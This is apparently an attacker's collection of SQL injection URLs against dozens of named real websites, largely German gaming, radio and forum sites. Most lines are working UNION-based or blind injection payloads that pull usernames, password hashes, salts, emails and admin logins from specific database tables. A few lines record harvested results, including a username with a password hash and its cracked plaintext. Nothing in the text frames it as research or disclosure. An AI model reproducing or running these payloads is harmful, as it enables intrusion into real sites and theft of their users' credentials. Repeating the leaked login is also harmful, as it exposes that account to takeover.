http://royal-esports.de/index.php?section=wars_detail&match_id=-43%27/**/UNION/**/SELECT/**/1,2,3,4,nick,password,email,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/**/FROM/**/lh_member--+
http://www.chaoskrieger.com/downloads.php?action=filedetails&fileid=-36'/**/UNION/**/SELECT/**/1,2,password,concat_ws(0x3a,username,password),5,email,7,8,9,10,11,12/**/FROM/**/bb1_users/**/WHERE/**/userid=6--+
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.kleinsche-flasche.de/admin/detail.php?id=-10/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/usr_wsa17_2.mrgame_phpbb_users/**/LIMIT/**/1,1/*
MD5 - a4ae46449f1074967bb1376d81335f69
gdataonline.com	89024703
http://www.sixpacks.org/index.php?page=showquiz&qid=-103/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gameresource.de/out.php?news=-104999/**/UNION/**/SELECT/**/1,2,VERSION(),0x27,0x27,0x27,7,8,9,10,11,12/*
http://www.gamaxx.de/send.php?news=-19494/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,unhex(hex(concat_ws(0x3a,username,password,salt,email))),10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/foren_user/*
http://bgs.gdynamite.de/send.php?news=-8727/**/UNION/**/SELECT/**/1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.zocko.de/forum/galerie.php?action=show&pic=10%27%20and%20ascii(substring((SELECT%20password%20from%20bb1_users%20limit%200,1),32,1))=54/*
User: BartTheDevil89
PW: 72bb3fc06c63e9ad6957d81747fc29f6 = randy01
http://www.finanzsoftware24.de/download.php?id=-381/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,username,user_password,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/FROM/**/biusoft_forum.phpbb_users/**/LIMIT/**/1,1--
http://zidz.com/munity_user.php?me=1%27/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,version(),concat_ws(0x3a,nic,pass),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/**/FROM/**/user/**/LIMIT/**/1,1/*&show=steckbrief
http://www.radioquintessenz.de/djs.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version(),5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/FROM/**/qe_forum.bb1_users--
http://www.luftfahrt.net/flugzeuge/flugzeug.php?id=-6/**/UNION/**/SELECT/**/1,concat_ws(0x3a,email,passwort),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/members/**/LIMIT/**/0,1/*
http://www.wochenspiegel-saarland.de/index.php?id=43&doc=-81980/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23/*
http://www.radio7.de/moderatorsDetail.php?mid=-12/**/UNION/**/SELECT/**/1,unhex(hex(concat_ws(0x3a,loginname,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin_user/*
http://www.gamecaptain.de/download.php?id=-4744/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password,salt),10,11,12,13,14,15,16,17,18/**/FROM/**/vbb_user/**/LIMIT/**/1,1--
http://www.serienoldies.de/gb/kommentar.php?id=-6178/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,pwd,email),7,8,9,10,11,12,13/**/FROM/**/pfuser/*
http://www.keindsl.de/kommentar.php?id=-541/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,user_password),7,8,9,10,11,12,13/**/FROM/**/phpbb_beta_5_users/**/LIMIT/**/1,1/*
http://www.gameradio.de/kommentar.php?news_id=-90/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10/*
http://www.jugendbibliothek-gera.7to.de/pgb/kommentar.php?id=-21/**/UNION/**/SELECT/**/1,2,3,4,version(),unhex(hex(concat(name,0x3a,passwort))),7,8,9,10,11,12,13,14,15/**/FROM/**/yuri_user/*
http://gaestebuch.ruebenlauf.de/kommentar.php?id=-117/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://www.infoportal24.org/kommentar.php?id=-4397%27/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7/*
http://www.fg-schwingenheuer.de/blog/kommentar.php?id=-125/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,concat_ws(0x3a,benutzer,passwort),15,16,17,18,19,20/**/FROM/**/usr_web148_2.login/*
http://www.subba-cultcha.com/article_feature.php?id=-5420/**/UNION/**/SELECT/**/1,concat(email,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/*
http://gw.buffed.de/daten/bosse/index.php?kapitel=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,email,icq,salt),5+FROM+user+LIMIT+0,1
http://www.ka-nightlife.de/locations.php?id=-5/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/**/from/**/bb1_users/**/limit/**/0,1&sid=
http://trekstor.de/de/products/detail_mp3.php?pid=-88/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.freebooknotes.com/book.php3?id=-32/**/UNION/**/SELECT/**/1,2,3,version()--
http://www.heavymetal.dk/links_bands_view.php?id=-286)/**/UNION/**/SELECT/**/1,2,version(),concat_ws(0x3a,username,password,email),5,6,7,8,9,10,11,12/**/FROM/**/users--
http://www.gamingguide.de/forum/index.php?page=XboxRanking&sortField=10%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1)=0x43,NULL,(select%201%20union%20select%202))&sortOrder=ASC
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,UserName,UserPass),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.test_scout_users/*
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.forum_users/**/LIMIT/**/1,1/*
http://boutiqueportal.com/index.php?main_page=customer_testimonials&testimonial_id=-1/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,admin_name,admin_pass,admin_email),version(),5,6,7,8/**/FROM/**/zen_admin/*
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version()/*
http://choices.de/kritik.php?id=122563/**/UNION/**/SELECT/**/1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.larsie.de/include.php?path=vote/archiv.php&vid=5%27)/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user_name,user_pw),3,4,5,6,7,8,9,10,11/**/FROM/**/sun25_usr_web201_3.phpkit_1_user+--+
------------
Dezember 2008:
 
http://www.clanscripte.net/main.php?content=newskommentare&action=view&newsid=-570/**/UNION/**/SELECT/**/1,version(),concat_ws(0x3a,name,pwd,email),4,5,6/**/FROM/**/csportal_users--
http://www.handit.de/index.php?fuseaction=detail&produktid=-5333+group%20by%20null+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19/*
http://privatamateure.com/show_message.php?messageid=-7016123/**/UNION/**/SELECT/**/1,2,3,version(),unhex(hex(concat_ws(0x3a,nickname,email,password))),6,7,8,9,10/**/FROM/**/user/*&kind=1
http://sig-box.de/?typ=tag&s=search&add=add&search=0%27%20UNION%20SELECT%200x27756E696F6E2073656C65637420312C322C332C342C352C362C76657273696F6E28292C382023,2%20--+